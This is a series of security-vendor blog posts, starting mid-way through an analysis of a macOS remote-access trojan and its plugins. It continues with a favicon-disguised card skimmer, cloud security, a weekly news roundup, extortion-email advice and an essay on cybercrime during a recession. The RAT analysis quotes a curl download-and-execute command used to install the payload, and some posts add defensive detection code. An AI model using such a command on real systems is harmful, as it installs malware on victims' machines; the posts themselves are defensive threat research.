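        "plists": [(p.parent.name, prog) for p, prog in find_dacls_plists(root)],
    }


if __name__ == "__main__":
    print(hunt_on_sample())
```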

Figure 2: Directory and file name generation

Config File

The config file contains the information about the victim’s machine such as Puid, Pwuid, plugins and C&C servers. The contents of the config file are encrypted using the AES encryption algorithm.

Figure 3: Load config

Both Mac and Linux variants use the same AES key and IV to encrypt and decrypt the config file. The AES mode in both variants is CBC.

Figure 4: AES Key and IV

The config file location and name are stored in hex format within the code. The name of the config file pretends to be a database file related to the Apple Store:


Figure 5: Config file name

The “IntializeConfiguration” function initializes the config file with the following hardcoded C&C servers.

Figure 6: Initialize config file

The config file is constantly updated by receiving commands from the C&C server. The application name after installation is “mina”. Mina comes from the MinaOTP application which is a two-factor authentication app for macOS.

Figure 7: Config file is being updated

Main Loop

After initializing the config file, the main loop is executed to perform the following four main commands:

  • Upload C&C server information from the config file to the server (0x601)
  • Download the config file contents from the server and update the config file (0x602)
  • Upload collected information from the victim’s machine by calling “getbasicinfo” function (0x700)
  • Send heartbeat information (0x900)

The command codes are exactly the same as Linux.dacls.

Figure 8: Main Loop

Plugins

This Mac RAT has all six plugins seen in the Linux variant, plus an additional plugin named “SOCKS”. This new plugin is used to proxy network traffic from the victim to the C&C server.

The app loads all seven plugins at the start of the main loop. Each plugin has its own configuration section in the config file, which is loaded when the plugin is initialized.

Figure 9: Plugins loaded

CMD plugin

The cmd plugin is similar to the “bash” plugin in the Linux RAT: it receives and executes commands by providing a reverse shell to the C&C server.

Figure 10: Cmd Plugin

File Plugin

The file plugin has the capability to read, delete, download, and search files within a directory. The only difference between the Mac and Linux version is that the Mac version does not have the capability to write files (Case 0).

Figure 11: File plugin

Process plugin

The process plugin has the capability of killing and running processes, getting process IDs, and collecting process information.

Figure 12: Process Plugin

If the “/proc/%d/task” directory of a process is accessible, the plugin obtains the following information from the process, where %d is the process ID (macOS has no /proc filesystem, so this directory is never accessible on a Mac):

  • Command line arguments of the process by reading “/proc/%d/cmdline”
  • Name, Uid, Gid, PPid of the process from the “/proc/%d/status” file.

Test plugin

The code for the Test plugin is the same in the Mac and Linux variants. It checks the connection to an IP and port specified by the C&C servers.

RP2P plugin

The RP2P plugin is a proxy server used to avoid direct communications from the victim to the actor’s infrastructure.

Figure 13: Reverse P2P

LogSend plugin

The Logsend plugin contains three modules that:

  • Check the connection to the log server
  • Scan the network (worm scanner module)
  • Execute long-running system commands

Figure 14: Logsend Plugin

This plugin sends the collected logs using HTTP POST requests.

Figure 15: User Agent

An interesting function in this plugin is the worm scanner. The “start_worm_scan” function can scan a network subnet on ports 8291 or 8292. The subnet that gets scanned is determined by a set of predefined rules. The following diagram shows the process of selecting the subnet to scan.

Figure 16: Worm Scan

Socks plugin

The Socks plugin is the new, seventh plugin added to this Mac RAT. It is similar to the RP2P plugin and acts as an intermediary that directs traffic between the bot and the C&C infrastructure. It uses SOCKS4 for its proxy communications.

Figure 17: Socks4

Network Communications

C&C communication used by this Mac RAT is similar to the Linux variant. To connect to the server, the application first establishes a TLS connection, then performs beaconing, and finally encrypts the data sent over SSL using the RC4 algorithm.

Figure 18: Traffic generated by the Application (.mina)

Figure 19: TLS connection

Both Mac and Linux variants use the WolfSSL library for SSL communications. WolfSSL is an open-source implementation of TLS in C that supports multiple platforms. This library has been used by several threat actors. For example, Tropic Trooper used this library in its Keyboys malware.

Figure 20: WolfSSL

The command codes used for beaconing are the same as the codes used in Linux.dacls. This is to confirm the identity of the bot and the server.

Figure 21: Beaconing

The RC4 key is generated by using a hard-coded key.

Figure 22: RC4 Initialization

Variants and detection

We also identified another variant of this RAT which downloads the malicious payload using the following curl command:

curl -k -o ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev

We believe this Mac variant of the Dacls RAT is associated with the Lazarus group, also known as Hidden Cobra and APT 38, an infamous North Korean threat actor performing cyber espionage and cyber-crime operations since 2009.

The group is known to be one of the most sophisticated actors, capable of making custom malware to target different platforms. The discovery of this Mac RAT shows that this APT group is constantly developing its malware toolset.

Malwarebytes for Mac detects this remote administration Trojan as OSX-DaclsRAT.

IOCs

The post New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Credit card skimmer masquerades as favicon

Wed, 05/06/2020 - 15:15

Malware authors are notorious for their deceptive attempts at staying one step ahead of defenders. As their schemes get exposed, they always need to go back to their bag of tricks to pull out a new one.

When it comes to online credit card skimmers, we have already seen a number of evasion techniques, some fairly simple and others more elaborate. The goal remains to deceive online shoppers while staying under the radar from website administrators and security scanners.

In this latest instance, we observed an old server-side trick combined with the clever use of an icon file to hide a web skimmer. Threat actors registered a new website purporting to offer thousands of images and icons for download, but which in reality has a single purpose: to act as a façade for a credit card skimming operation.

The suspicious favicon

This latest case started with a favicon: the small image displayed on the browser’s tab that is often used for branding or identifying a website.

Figure 1: Some favicons from popular websites

While reviewing our crawler logs, we noticed requests to a domain called myicons[.]net hosting various icons and, in particular, favicons. Several e-commerce sites were loading a Magento favicon from this domain.

Figure 2: A favicon.png for the Magento CMS

This in itself is not particularly suspicious. However, we noticed that the domain myicons[.]net was registered just a few days ago and was hosted on a server (83.166.244[.]76) that was previously identified as malicious. In a blog post, web security company Sucuri disclosed how this host was part of a web skimming campaign using time-based domain names.

In addition, we found that the person who registered myicons[.]net stole all the content from a legitimate site hosted at; and they did it in the most simple way—by loading it as an iframe:

<iframe src="" width="100%" height="1015px" frameborder="0" align="left">

Figure 3: Decoy site with original site

Our suspicion was that the favicon.png file was malicious and perhaps used steganography to hide JavaScript code. But this was not the case. The image was properly formatted, with no extra code inside.

Figure 4: Suspicious image file turns out to be clean

Conditional server-side response

To better understand what was going on before ruling this out as a false alert, we examined how this file was served in the context of an online purchase. Lo and behold, when visiting the checkout page of a compromised Magento website, the innocent favicon.png turned into something else altogether.

Figure 5: The same web request with a referer including the ‘checkout’ keyword

Instead of serving a PNG image, the malicious server returns JavaScript code that consists of a credit card payment form. This content is loaded dynamically into the DOM to override the PayPal checkout option with its own drop-down menu for MasterCard, Visa, Discover and American Express.
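The referer-conditional behaviour described above can be checked for mechanically. This added Python example (not code from the original post) classifies what each response body actually is, flags a Content-Type header that disagrees with the body, and flags a URL that serves an image for ordinary referers but script once the referer contains “checkout”. The URL, referers and response bodies are constructed placeholders.

```python
from dataclasses import dataclass
from typing import List, Optional

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


@dataclass
class Response:
    """One fetch of the same URL, as a crawler would record it."""
    referer: Optional[str]
    content_type: str
    body: bytes


def body_kind(body: bytes) -> str:
    """Classify a body by its bytes, ignoring whatever the server claimed."""
    if body[:8] == PNG_SIGNATURE:
        return "png"
    text = body[:512].decode("utf-8", errors="replace").lstrip().lower()
    if text.startswith(("<html", "<!doctype")):
        return "html"
    if any(tok in text for tok in ("function", "document.", "var ", "let ", "const ")):
        return "javascript"
    return "unknown"


def cloaking_findings(url: str, responses: List[Response]) -> List[str]:
    """Compare what one URL returns under different referers.

    Reports (a) a declared image/png whose body is not a PNG (or vice versa) and
    (b) a URL whose body type changes when the referer contains 'checkout'.
    """
    findings = []
    kinds = {}
    for r in responses:
        kind = body_kind(r.body)
        kinds[r.referer or ""] = kind
        declared = r.content_type.split(";")[0].strip().lower()
        if (declared == "image/png") != (kind == "png"):
            findings.append(
                f"{url}: Content-Type {declared!r} but body looks like {kind} "
                f"(referer={r.referer!r})")
    checkout = {k for ref, k in kinds.items() if "checkout" in ref.lower()}
    other = {k for ref, k in kinds.items() if "checkout" not in ref.lower()}
    if checkout and other and checkout.isdisjoint(other):
        findings.append(
            f"{url}: serves {sorted(other)} normally but {sorted(checkout)} "
            f"when the referer contains 'checkout'")
    return findings


# Constructed sample: placeholder host, a real PNG header for ordinary referers
# and a harmless script body once the referer points at a checkout page.
SAMPLE_URL = "https://icons.example/d/favicon.png"
SAMPLE_RESPONSES = [
    Response(None, "image/png", PNG_SIGNATURE + b"\x00" * 16),
    Response("https://shop.example/", "image/png", PNG_SIGNATURE + b"\x00" * 16),
    Response("https://shop.example/checkout/", "image/png",
             b"document.addEventListener('DOMContentLoaded', function () {});"),
]


def sample_findings() -> List[str]:
    """Run the check over the constructed sample; two findings are expected."""
    return cloaking_findings(SAMPLE_URL, SAMPLE_RESPONSES)


if __name__ == "__main__":
    for line in sample_findings():
        print(line)
```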

Figure 6: Malicious content hijacks default payment form

“Ant and cockroach” skimmer

This skimmer may be familiar to some under the nickname “ant and cockroach.” It is somewhat unique in that it is customized for English and Portuguese checkout forms.

In addition to JavaScript code, it contains HTML that will be injected into the checkout page of compromised stores. The idea is to blend in so that shoppers don’t notice anything suspicious.

Figure 7: Rogue HTML form injected into checkout page

While web skimmers primarily focus on credit card data, they typically also collect additional personal information about the victims, including name, address, phone number, and email.

Figure 8: Data fields collected by the skimmer

That data is encoded and then sent back to the criminals. For client-side skimmers, the exfiltration domain could be another hacked site or a malicious site registered strictly for this purpose.

Figure 9: Exfiltration code sending data back to the criminals

Here the exfiltration domain is psas[.]pw and resides on known criminal infrastructure on the IP address 83.166.242[.]105. Back in March we described a campaign abusing Cloudflare’s Rocket Loader script which we believe is tied to the same threat group.

One of many web skimmer campaigns

Given the decoy icons domain registration date, this particular scheme is about a week old but is part of a larger number of ongoing skimming attacks.

Malwarebytes users are protected via our real-time web security module available in both Malwarebytes for Windows and via our Browser Guard extension available for both Google Chrome and Mozilla Firefox.

Figure 10: Malwarebytes Browser Guard blocking data exfiltration

Indicators of Compromise

Skimmer URL, domain, IP and SHA256

myicons[.]net/d/favicon.png myicons[.]net 83.166.244[.]76 825886fc00bef43b3b7552338617697c4e0bab666812c333afdce36536be3b8e

Exfiltration domain and IP

psas[.]pw 83.166.242[.]105

The post Credit card skimmer masquerades as favicon appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: cloud-delivered security

Tue, 05/05/2020 - 15:15

As a counterpart to security for your assets in the cloud, you may also run into solutions that offer security from the cloud. These solutions are generally referred to as cloud-delivered security. Cloud-delivered security is sometimes called security-as-a-service, a term we will avoid here as it might be confused with the more generally used term Software-as-a-Service (SaaS).

Types of cloud-delivered security

It is not hard to imagine several types of cloud-delivered security:

  • Definitions or rules for detection are in the cloud
  • Security controls and logs for systems in multiple locations are kept in the cloud
  • Suspicious files that are not recognized are uploaded to the cloud for closer inspection
  • The security applications run completely or partially in the cloud and check on the security health of the physical systems

With detection criteria in the cloud there is only one update needed for new definitions and not for every individual system.

Controls and logs in the cloud enable security management to be the spider in the web from virtually anywhere.

The closer inspection of a suspicious file can be done by the security provider themselves or by a more general resource such as VirusTotal.

Using containerization, security applications can be shared amongst different systems, even if they are running a different operating system.

Models of cloud-delivered security

Besides these different types, there are also three basic cloud delivery models:

  • Software as a Service (SaaS)
  • Platform as a Service (PaaS)
  • Infrastructure as a Service (IaaS)

SaaS clients use applications supplied by a service provider. SaaS does not allow or require any control of the cloud platform or the infrastructure. This can be beneficial to some organizations while others would like at least some control.

PaaS users can deploy consumer-created or acquired applications using programming languages and tools supported by the provider’s content policies. This limits the choices, but it also enhances security.

IaaS is interesting for more sophisticated and demanding users as it allows them to deploy and run arbitrary software. This could apply to both operating systems and applications.

The main difference for these three delivery models is the internal organization of the cloud infrastructure. For the user this mainly results in a degree of freedom in how to use the infrastructure.

Cloud-enabled architecture

A cloud-enabled architecture is by definition built in the cloud and delivered as a service. This means it provides a platform that you can easily deploy, and it will help you minimize the need for costly appliances and backhauling.

Moving existing critical capabilities such as endpoint security into the cloud requires even more careful consideration of a wide range of privacy and security assurances than starting out on a cloud-enabled architecture does. But sometimes the choice between the two isn’t available: circumstances do not always allow for the easy path of stepping into a readily prepared platform.

SaaS-based, cloud-enabled architecture should provide customers with a system that can be operational in minutes and requires no on-premise infrastructure. It may combine multiple security functions into one solution, so you can extend protection to devices, remote users, and distributed locations anywhere.

Integrated cloud security service benefits:

  • Flexible security protection on and off network
  • Consistent policies across remote locations
  • Easier to scale on a subscription-based model

Benefits of cloud-delivered security

There are several benefits of cloud-delivered security:

  • The protection will benefit all cloud resources and the SaaS applications
  • It makes it easier to get insight into mobile users, application usage, and overall traffic
  • Enhancement of management efficiency because it can be centralized and done with minimal effort
  • Significant improvement in discovered malware incidents and attempted breaches
  • As a result, a reduction of security related downtime
  • Ease of gathering sufficient audit evidence

What to look for in cloud-delivered security

There are several aspects organizations may be looking for in a cloud security solution. These can vary by type of organization and their priorities. In no particular order these may be:

  • Assistance from security vendors
  • Cloud administration and management
  • Scalability and cost efficiency
  • Protect all critical infrastructure
  • Extra features

Security should work for the organization and not the other way around. Security vendors are expected to assume a stronger, more active role in managing and helping the client to maintain the protection of their systems and network(s). Cloud-delivered security allows the organization to focus on their business and abandon or reduce the do-it-yourself security approach.

For businesses looking to simplify their security management through the elimination of hardware, reduced administration, and centralized management, the cloud is the most viable option. And it allows the vendor or a provider to perform remote administration and management.

Cloud-delivered services can dynamically grow and shrink based on the needs of the organization and you only pay for what you need based on usage. Moreover, it can also be less expensive to acquire since they are usually sold on a subscription basis, where payments are spread out over time.

To optimize the use of assistance, centralized management, and scalability, a cloud-delivered security solution should be designed to protect all critical infrastructure, applications, and data delivered as-a-service.

Usually organizations can add extra services or features to the security solution, which can include, for example, identity management, email security, and other features.

Possible drawbacks of cloud-delivered security

Some organizations may shy away from cloud-delivered security for various reasons.

Organizations may feel they have less control over the functionality of the security solution, which is not always justified, as it depends on the chosen model. And most of the time you will still be able to file feature requests with the vendor and work them out.

Organizations may have doubts about the privacy of the delivered technology and storage of logs in the cloud. But if you can’t trust your security vendor there is a worse problem that needs to be solved first.

Further, data residency can lead to compliance issues for some organizations in some countries. This absolutely should be researched before onboarding with a vendor. It would be a shame to engage in an onboarding process only to find out that there will be compliance issues.

Smaller businesses and cloud-delivered security

Smaller businesses can still profit from cloud-delivered security by acquiring it from a Managed Services Provider (MSP). Security vendors will provide MSPs with a cloud management console where they can keep an eye on all their customers. This enables the MSP to protect, monitor and remediate against security threats.

Stay safe everyone!

The post Explained: cloud-delivered security appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (April 27 – May 3)

Mon, 05/04/2020 - 15:17

Last week on Malwarebytes Labs, we looked at how secure the cloud is, understood why unexpected demand can influence an organization to consider their “just in time” (JIT) system, speculated on why the threat actors behind the Troldesh ransomware suddenly released thousands of decryption keys, preached the good news about VPN being mainstream, touched on the relationship between cybercrime and a challenged economy, and identified what users can do if they received an extortion email.

Other cybersecurity news
  • The season of threat actors banking on coronavirus continues as fake news sites spring up to promote a “pandemic survival book.” (Source: Avast Blog)
  • Cybersecurity experts warned small- to medium-sized businesses about an increase in targeted attacks, thanks to the pandemic (Source: TechRadar)
  • While internet users are using VPN all the more, experts have seen attacks on something probably no one has thought about protecting: the router. (Source: InfoSecurity)
  • Phishers targeted Zoom users yet again with spoofed meeting notifications that would likely cause them to panic and click the phishing link. (Source: Bleeping Computer)
  • Payment card details owned by US and South Korean citizens were reportedly sold underground for $2M USD. (Source: Group-IB)
  • While governments have renewed interest into using contact tracing apps to help contain COVID-19, the interest in using Bluetooth attacks may naturally follow. (Source: ZDNet)
  • Israel’s National Cyber Directorate published an alert about attacks on supervisory control and data acquisition (SCADA) systems. (Source: Security Week)
  • Parking meter vendor CivicSmart was attacked by ransomware and had their data stolen. (Source: StateScoop)
  • Some ransomware gangs opted out of targeting hospitals; for others, it’s business as usual, as a Colorado hospital was shut down by ransomware. (Source: Health IT Security)
  • OceanLotus APT is suspected to be behind an espionage campaign dubbed PhantomLance, which targeted specific victims in Southeast Asia. (Source: Threatpost)

Stay safe everyone!

The post A week in security (April 27 – May 3) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

What to do when you receive an extortion email

Fri, 05/01/2020 - 15:30

In the last few weeks, there has been an upswing in people receiving threatening, extortion email messages, demanding payment to avoid release of sensitive information. Most of the time, these emails are what we call “sextortion” emails, as they claim that malware on your computer has captured embarrassing photos of you through the webcam, but there can be other variants on the same theme.

These extortion emails are nothing new, but with the recent increase in frequency, many people are looking for guidance. If you have received such an email message and want to know how you should respond, you’re in the right place. Read on!

Extortion claims

These email messages are not all exactly the same, but they do have fairly common characteristics. Consider the following example:

This is fairly representative of many examples. It starts out by telling you that the scammer knows one of your passwords, and the password really IS one of your passwords, which immediately ratchets up the fear and puts you in a mindset to believe that the rest of the message is also true. (Hint: it is not.)

Next, it tells you that the scammer knows other things about you, including photos of you doing something embarrassing, captured through malware on the computer. The message threatens to send these photos to people you know. Some variants may not involve this kind of “sextortion,” but the general pattern of doing something damaging with data stolen from the user is the same.

In order to prevent this, the scammer demands to be paid, usually in a currency called Bitcoin. There’s usually a time limit given for the payment, to really put the pressure on and encourage fast action rather than seeking help.

Are the extortion claims true?

With one exception, none of this is true. There is no malware involved. The scammer does not have any of the claimed information. If you don’t pay the demanded sum, nothing bad will happen. For the most part, these messages can simply be ignored.

However, the one part that is true is the password—which is the part that makes everything else seem more believable. The password did not, however, come from malware on the computer. Instead, it came from a third-party data breach.

What happens is that a site you have an account on gets breached, and someone is able to extract a bunch of email addresses and passwords. How this happens is not particularly important for our purposes here, but the effect is that two pieces of your personal information may have been published to various “dark web” sites: your email address and a password used with an account associated with that email address.

This is very similar to someone writing your phone number on the wall in a bathroom stall: it becomes public knowledge, for anyone who knows where to look, and it can lead to a lot of harassment.

Once this information has become public knowledge, criminals can take these lists and send mass email messages to everyone on the list, including the password associated with each email address. This is the real source of the seed of truth in these messages, not the fictitious malware the scammers want you to believe you’re infected with.

So I can ignore this, right?

Well, yes and no. Yes, the threat itself is an empty one, since there’s no malware. However, there’s a real danger under the surface: you have a password that has become public knowledge!

If the password provided is an old one that you are no longer using, then you’re golden. You’ve got no need to do anything further. However, for many people, the password is one that is still in active use, and that presents a problem. This particular scammer decided to use the password to scare you, but there are other criminals out there who might decide to use it for more nefarious purposes, like taking over your online life!

To prevent this from happening, there are a few steps you’ll need to take.

Step 1: Change your password

First and foremost, on any account using the password that was provided, change your password. While you’re at it, though, let’s make sure that it’s a good strong one. The best passwords are long, random ones… for example, “vdBdq8GoDh8ELGm$qRdgXVTq.” The longer the better.

It’s also important to use a different password on every site. Because password breaches will always happen, if you use the same password on multiple sites, that can lead to a breach on one site making it possible for an attacker to access your accounts across many different sites.

Okay, I hear you. No, I’m not expecting you to memorize ridiculous passwords for every site you have an account on. There’s a solution to that problem.

Step 2: Use a password manager

A password manager is a program designed to remember your passwords for you. Password managers can keep a list of not just your passwords, but also what site you’ve used them on, the username you use to log in to that site, any security questions you use on that site, etc.

A password manager can be as simple as a notebook you keep in a drawer in your desk. Of course, that’s also something that can be read by anyone with access to your office, and it’s not something you can easily carry around with you.

Password managers more typically come in the form of software, which can encrypt your passwords with a single master password, help you share them between devices, and much more.

You may have a password manager right at your fingertips already, as some web browsers have them built in. Examples include iCloud Keychain in Safari, Google Password Manager in Chrome, and the Firefox Password Manager.

Safari’s password management settings

If you use a more obscure browser, don’t want to use the built-in password manager, or just need something more powerful, you can consider something like 1Password or Lastpass.

Whatever fits your particular needs, use it. A password manager is the only way you can realistically have long, strong passwords that are different on every site. Your password manager’s “master” password becomes the only password you need to remember.

Creating a master password for your password manager follows the same, simple rules for your regular passwords—the longer the better. Since you’ll be typing this password in regularly, it could be easier to make a passphrase, which is a string of words that should have no direct meaning to you. Avoid birthdates and street addresses and lean into the chaos of your brain’s random word generator: something like “cantankerousbuffalopotteryhypothesis.”
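Steps 1 and 2 boil down to “long, random, unique, stored in a manager.” The following is an added example, not code from the original post, showing how a practitioner generates both kinds of secret the post describes (a random password like “vdBdq8GoDh8ELGm$qRdgXVTq” and a passphrase like “cantankerousbuffalopotteryhypothesis”) and how to put a number on their strength. It uses only Python’s standard library; the `secrets` module is a CSPRNG, unlike `random`. The function names, the symbol set and the tiny `TOY_WORDS` list are my own choices for the demo; a real passphrase list (Diceware, the EFF long list) has about 7776 words.

```python
import math
import secrets
import string

# Character classes a generated password must cover. `secrets` draws from the
# OS CSPRNG; never use `random` for credentials, its output is predictable.
LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase
DIGITS = string.digits
SYMBOLS = "!$%&*+-=?@^_"          # assumption: a symbol set most sites accept
ALPHABET = LOWER + UPPER + DIGITS + SYMBOLS


def generate_password(length=24):
    """Uniformly random password over ALPHABET, resampled until every class
    appears (rejection sampling keeps the distribution uniform over the
    accepted set, and for length >= 16 almost no draws are rejected)."""
    if length < 4:
        raise ValueError("need at least 4 characters to cover every class")
    while True:
        pw = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if (any(c in LOWER for c in pw) and any(c in UPPER for c in pw)
                and any(c in DIGITS for c in pw) and any(c in SYMBOLS for c in pw)):
            return pw


def generate_passphrase(wordlist, words=4, sep="-"):
    """Passphrase of `words` words chosen uniformly, with replacement, from
    wordlist. The strength comes from the list size and word count, not from
    the words themselves, so picking them by hand defeats the purpose."""
    return sep.join(secrets.choice(wordlist) for _ in range(words))


def entropy_bits(choices_per_position, positions):
    """Guessing entropy of `positions` independent uniform choices from
    `choices_per_position` options: positions * log2(choices)."""
    return positions * math.log2(choices_per_position)


# Constructed toy wordlist for the demo only; eight words give just 3 bits per word.
TOY_WORDS = ["cantankerous", "buffalo", "pottery", "hypothesis",
             "avocado", "falcon", "lantern", "marble"]

if __name__ == "__main__":
    print(generate_password(24), f"({entropy_bits(len(ALPHABET), 24):.1f} bits)")
    print(generate_passphrase(TOY_WORDS), f"({entropy_bits(len(TOY_WORDS), 4):.1f} bits)")
    print(f"4 words from a 7776-word list: {entropy_bits(7776, 4):.1f} bits")
```

A 24-character password over this 74-symbol alphabet carries about 149 bits; four words from a 7776-word list carry about 52 bits, which is plenty for a master password that is only ever typed into your own password manager and never sent to a site that could be breached.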

Whoa, hold on a minute! Don’t walk away yet. Having good passwords and a way to store them is only a small part of the battle. After all, a good password is no good as soon as the site gets breached by a hacker and spills all its passwords. Believe it or not, there’s something else beyond the password.

Step 3: Use two-factor authentication

Two-factor authentication (abbreviated 2FA) means a secondary piece of information, in addition to a password, is required for you to log into a website. This is typically a short code, most commonly four or six digits, that you must enter during the login process.

The most common way to receive these codes is via text message on your phone. However, they can also be codes that change every 30 seconds, generated by a variety of apps such as Authy, Google Authenticator, or some more full-featured password managers. These app-generated codes are more secure than texted codes, which can be intercepted by someone who hijacks your phone number (so-called SIM swapping), but they are also less commonly supported, and codes sent to your phone via text message are still far better than nothing.

2FA token generated by Authy on an iPhone

Whatever type your accounts support, use it. It can take some time to set this up these days, when people often have a LOT of accounts, so just take it a few at a time until you’re done.

For help figuring out what kinds of 2FA a site supports see the Two Factor Auth site. You can search this site for the site you’re interested in, and it will tell you what types of 2FA it supports (SMS and Software Token being the two types described above), and link you to that site’s documentation for how to set up 2FA.

For more information about 2FA, see Duo Security’s Two-Factor Authentication: The Basics.

Step 3a: What if there’s no 2FA?

Some sites don’t support 2FA, instead only supporting something like security questions… you know, “What’s the name of your first pet,” or “What street did you live on growing up,” and any number of other similar questions. Here’s the problem with these questions: they’re easy to guess, and the information may be public knowledge.

So, here’s what you do if security questions are all you have to secure a site: lie! Never, ever use true answers to security questions. Instead, make something up. For example, maybe say your first car was a “Millennium Falcon.” Or maybe you drove an “avocado toast.” Even better, say you drove a “dknO6RF%an!Fdke8.”

By now, I’m sure you’re not asking how you’re supposed to remember these ridiculous answers, because you know what the answer will be already: use your password manager. Most password managers support arbitrary notes, so add both the questions and the nonsensical answers to a note for that login in your password manager.

Wrapping up

If you skipped to the end without reading the details (we hope you did not), here’s the tl;dr: these messages are fake, there is no malware involved, and the only thing to be concerned about is the fact that one of your passwords is floating around in cyberspace.

Once you have followed all the instructions above to secure your online accounts, you’ll have nothing left to do, other than mark the message as junk and delete it (if you haven’t already).

Keep in mind that no antivirus software can prevent you from seeing these types of extortion messages. Email systems or clients that do junk mail (spam) filtering can help to catch some of these, but they cannot be relied on to catch all of them. These scammers are sneaky, and are good at evading junk mail filtering.

The fact that you keep receiving these extortion messages does not represent a security issue, and you do not need to be afraid of these thugs. They are only a threat to your wallet, and only if you fall for their tricks and send them money. Otherwise, they cannot do you any harm… so long as you’ve secured your accounts so they can’t use your leaked password against you.

The post What to do when you receive an extortion email appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cybersecurity and the economy: when recession strikes

Thu, 04/30/2020 - 15:11

Cybercrime and the economy have always been intertwined, but with COVID-19 on the road to causing a seemingly inevitable global recession, many are asking what, exactly, will the impact be on cybercrime. Will criminals step up and increase malware production, ramp up phishing attacks, do whatever it takes to pull in some cash? Or will it cause a little downturn in malware making and other dubious dealings?

Cyber recession: setting the scene

One of the key reference points is 2009, the year of the last global recession. While searching for information, one of the flashpoints which kept coming up was a paper put together by a team of researchers from around the world called Crime online: cybercrime and illegal innovation. Almost every article which came back to me referenced it in some way, and it was front and centre for every writeup. It’s so pervasive that even articles written in the last 12 months tend to link it when talking about the impact of recessions on professional computer criminals.

The Telegraph, Metro, OneIndia and many more all focused on the impact the recession would have as per the research paper. The only problem? Having read it, the paper mentions a recession 3 times, 2 of which are the same sentence reused stating that a global recession will likely increase the chances of people moving into cybercrime. And for all the lasting impact references to this paper have had down the years, that’s essentially what all of the linkage is based on: someone saying “here comes the cybercrime recession, probably”.

The Past: Making predictions

Mostly, it’s a very solid and wide-ranging paper covering a large range of threat developments, from credit card fraud and phishing to malware authoring and “value chain analysis.” All very interesting, but outside of many claims that technology x or people getting better at y would result in probable increases in z, nothing really leapt out at me to say, “recession is going to explode bad activity online and this is why”. Was it possible people on the receiving end of the presumed press release saw the single line about recession and pinned their entire piece around it? Who knows, but there didn’t seem to be an awful lot to go on.

Putting the puzzle together

In fairness, it’s not just that one research paper taking up the entirety of 2009’s “here comes the recession hacker boom” content. It was up for discussion and there’s no harm in considering the problem. A panel back in 2009 talked about how a recession creates “more cybercriminals” who then go on to do a lot more cybercriminaling. There’s a fair bit of assumption at work here; that a big slice of people hit by a recession will automatically turn to crime, and computer crime at that. If resources are tight and money is short, if people are so physically impacted by a recession that they need to turn to crime to survive, will they:

  1. Invest time, electricity, and stamina they may not have on crash course hacking, malware, phishing, digging around on forums for someone—anyone—to help them so they can maybe go off and rip someone off online with no guarantee any of it will work; or
  2. Go out and steal some food or break into physical objects such as cars?

Personally, I’d be in Camp B all the way. Camp A seems like incredibly slim vanishing returns all round.

Wages down, crime up? Not so simple

When a recession hits, do criminals come creeping out of the woodwork? More to the point, do we end up with whole new waves of criminals? We have a few data points we can draw on for this. When major recessions and downturns have struck, crime rates can actually fall significantly. Apart from anything else, it’s quite tricky for career burglars to go about their business when economic factors are keeping people at home.

Throw a global pandemic into the mix which relies on as many people as possible staying indoors whether working or not, and it’s time to get a new criminal enterprise. The question is what, specifically, that criminal enterprise would involve. Computers or something else?

Driving the direction of technological attacks

While many folks seem to think cybercrime is the perfect place to go for replacement crime activities, the reality is it’s not quite that straightforward. In more normal times, the shifts inside online crime as a whole are an ebb and flow towards different types of attack, as opposed to some sort of wholesale digital stampede to do something differently.

For a while now, we’ve seen consumer detections decrease while their business counterparts go up due to the juicy stuff being locked away behind corporate firewalls. Now, with so many people working from home, we expect to see cybercriminals modify their approach somewhat and start going back to poking around home computers (or at least, work computers suddenly on a home network).

Here comes the massive caveat:

It’s worth mentioning that for every “crime goes down during a recession” piece you know of, you’ll always find a few others claiming the opposite. You want confusing? Have fun with the first page of search results in Google should you want to do some digging of your own:

Click to Enlarge

Criminology and sociology aren’t my field of expertise, and I don’t pretend they are. I’m just highlighting the potentially significant shifts in data analysis for anyone trying to figure out the cybercrime / recession link, because even the non-cybercriminal data seems to have a hard time being stacked up one way or another depending on which data is used and who is telling the story.

What about good old infection / attack numbers? Is it even possible to dust off a big book of figures from more than a decade ago?

Playing the numbers

The answer is “sort of”, and “very cautiously”. Cybercrime from last year tends to be somewhat old hat, never mind something from 5 or 10 years ago which often looks as though it’s landed here from another planet. Everything and anything could potentially be different, from infection types, to spreading techniques, to operating systems and security tools, even down to the way everybody from security vendors and governments tally up their figures.

Having said that, there are some interesting snippets of information buried in the pile. The Great Recession hit in 2009, after the build-up of the 2007-08 financial crisis. A UKGOV-hosted cybercrime report from 2013 notes that many aspects of internet fraud dipped around the time of the year-long recession, with higher tallies surrounding it depending on attack type.

“Internet enabled card-not-present fraud” (catchy!) fell to around £131 million in recorded losses in 2010, from a peak of about £181 million in 2008. This is, however, a partial estimate. Online banking fraud hit a peak of £59.7 million in the year of the recession before collapsing to £39.6 million by 2012. Even so, Financial Fraud Action reported “just” 50k banking phishing incidents in 2009 and 256k by 2012.

The malware explosion of 2012 onwards

Numbers are somewhat tricky to come by, but not impossible. Although this AV Test chart for overall malware development begins with 2011, you can see the full chart in this 2015/16 PDF document, which ranges from 1.7 million in 2005 all the way up to some 578 million(!) in 2016. From 2007 onwards, the total increases year on year by anything between 10 and 20 million, with nothing unusual about 2009 compared to the others. In fact, it isn’t until 2012/13 that the numbers begin to explode into the stratosphere. The one thing I mainly remember about 2009 in terms of security was the prevalence of worms: Sality, Conficker, and others.

In terms of *new* malware created per year, another AV Test report (2017/18) is similarly illuminating. Once again, 2009 isn’t particularly notable whereas 2012 seems to be the point where things kick into high gear, remaining that way until 2016 when things take a small dip.

Elsewhere, though, different types of fraud received a boost. Internet fraud losses were up to the tune of 33% in 2008, though your mileage will vary with regards to taking the final year of the financial crisis and tying it specifically to the period of 2009 accepted as the recession itself. However you stack it up, it’s fair to say some types of crime would go up and some down, as expected – or at least, not explode the way you’d think it might.

Present: The cybers will get us

